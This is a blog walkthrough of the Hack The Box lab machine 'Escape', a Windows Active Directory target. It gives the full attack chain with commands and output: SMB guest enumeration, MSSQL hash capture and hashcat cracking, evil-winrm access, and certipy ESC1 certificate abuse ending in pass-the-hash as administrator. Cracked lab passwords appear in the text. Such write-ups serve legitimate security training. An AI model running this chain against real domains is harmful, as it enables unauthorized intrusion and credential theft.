> For the complete documentation index, see [llms.txt](https://blind0bandit.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-escape.md).

# HTB - Escape

<figure><img src="/files/hFG0vvj4C8fK1Kh0aWwy" alt=""><figcaption></figcaption></figure>

## Descripiton

Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user `ryan.cooper`. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after:  2054-11-03T17:33:04
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

**Summary**

```R
* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS- RPC - SMB - LDAP - LDAPS - MSSQL - winRM - NTP
* Important notes: DNS:dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019
```

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo  '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htb
```

**Kerberos Enumeration**

I started my enumeration process by bruting kerberos since I need domain account to attack the box as no web server here but with no luck

```bash
kerbrute userenum -d sequel.htb --dc $ip jsmith.txt -o users
```

<figure><img src="/files/76x2tqROoo9cO9ypKWEn" alt=""><figcaption></figcaption></figure>

**SMB & RPC Enumeration**

I moved then to smb and rpc services looking for misconfiguration in shared folder permissions or rpc. I found I had `READ` access on the `Public` share and no access to RPC.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
```

<figure><img src="/files/zGa6wff5uB7RZNmFn3Dy" alt=""><figcaption></figcaption></figure>

I connected to the share and download a pdf file from it

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc

# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw-          0  Sat Nov 19 06:51:25 2022 .
drw-rw-rw-          0  Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw-      49551  Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdf
```

After opening the file, I noticed there are credentials at the end of it.

<figure><img src="/files/LTC85mwDwHayPLmWbwdR" alt=""><figcaption></figcaption></figure>

## Foothold

***

```R
PublicUser:GuestUserCantWrite1
```

I can access the database with these creds :))

<figure><img src="/files/Kqiy5nCVn6VuETgZHt4l" alt=""><figcaption></figcaption></figure>

When I deal with `mssql`, I perform checklist for possible attack paths, So I will create one

* Check for admin Access
* Check the databases for juicy info and secrets
* Check the possibility capture the `mssql` service account
* Check for impersonate other users
* Check for trustworthy database
* Check for Linked Server
* Check for Read or Write Access to the file system
* Check for executing command with `xp_cmdshell`

```bash

SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   

SQL (PublicUser  guest@master)> enum_links
SRV_NAME     SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE   SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
----------   ----------------   -----------   --------------   ------------------   ------------   -------   
DC\SQLMOCK   SQLNCLI            SQL Server    DC\SQLMOCK       NULL                 NULL           NULL

SQL (PublicUser  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   ------- 

SQL (PublicUser  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL
```

Nothing is interesting till now but I got the hash of service account using local smb server.

<figure><img src="/files/2KQJaIhnOnw9U3cONJYl" alt=""><figcaption></figcaption></figure>

The hash is cracked successfully

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $hashcat -m 5600 sql.hash /usr/share/wordlists/rockyou.txt 


..snip..
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:afe08a49ef50bb618c7ebe172f3fc719:01010000000000008014fb68d92ddb01dff7d14561d219d700000000010010006a006c00720069006500550047005300030010006a006c007200690065005500470053000200100071004c0043004300780042007a0049000400100071004c0043004300780042007a004900070008008014fb68d92ddb01060004000200000008003000300000000000000000000000003000008ab9cecef8fc5bd1bf12dec37969b9f951514a8bb2b1613c8c474ba64776dcc40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310032000000000000000000:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked
```

I can also access the database with the new account.&#x20;

<figure><img src="/files/uaT9qgiVbCTw9XIVgAOm" alt=""><figcaption></figcaption></figure>

The account don't have special permissions So I will move to `winRM`

```bash
SQL (sequel\sql_svc  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
    
-   
0  
```

## Lateral Movement

***

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u sql_svc -p REGGIE1234ronnie

*Evil-WinRM* PS C:\Users\sql_svc\Documents>
```

Under `C:\SQLServer\Logs`, there is a `.bak` file containing logs info of MSSQL instance. What is interesting is that I find `Ruan.Cooper` trying to login and failed. Maybe I can use this string as a password `NuclearMosquito3`

```bash
*Evil-WinRM* PS C:\SQLServer\Logs> dir

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK

..snip..
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..
```

And the password is correct :))

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3

LDAPS  10.10.11.202   636  DC   [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 
```

## Privilege Escalation

***

I accessed the machine as `Ryan` and found he is a member of `Certificate Service DCOM Access`

<figure><img src="/files/mIUHdJwFH55302cn8Akw" alt=""><figcaption></figcaption></figure>

I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with name of `sequel-DC-CA`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs

LDAPS       10.10.11.202    636    DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 
ADCS        10.10.11.202    389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.202    389    DC               Found PKI Enrollment Server: dc.sequel.htb
ADCS        10.10.11.202    389    DC               Found CN: sequel-DC-CA
```

Then, I looked at vulnerable template for possible Escalation paths (ESC)

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -vulnerable -stdout

    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True  

..snip..

    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
```

The template `UserAuthentication` is vulnerable to ESC1 which means I can request certificate with alternative principal name `(upn)`

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5xxxxxxxxxxxxx
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u administrator -H a52f78e4c751e5f5exxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6ecb67c8db147ac353xxxxxxxxxxxxxxx
```

> Root Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx
